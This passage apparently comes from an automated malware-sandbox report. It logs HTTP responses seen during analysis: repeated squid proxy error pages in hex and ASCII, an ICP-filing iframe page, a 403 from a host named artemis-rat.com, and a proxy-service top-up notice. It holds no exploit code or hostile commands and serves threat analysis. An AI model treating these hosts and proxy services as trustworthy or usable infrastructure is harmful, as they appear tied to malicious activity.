                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:32 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:32 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.3.8Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:30 GMTContent-Type: text/htmlContent-Length: 3556X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:33 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 281Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:33 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: closeData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:33 GMTServer: ApacheContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:34 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:34 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:34 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:34 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 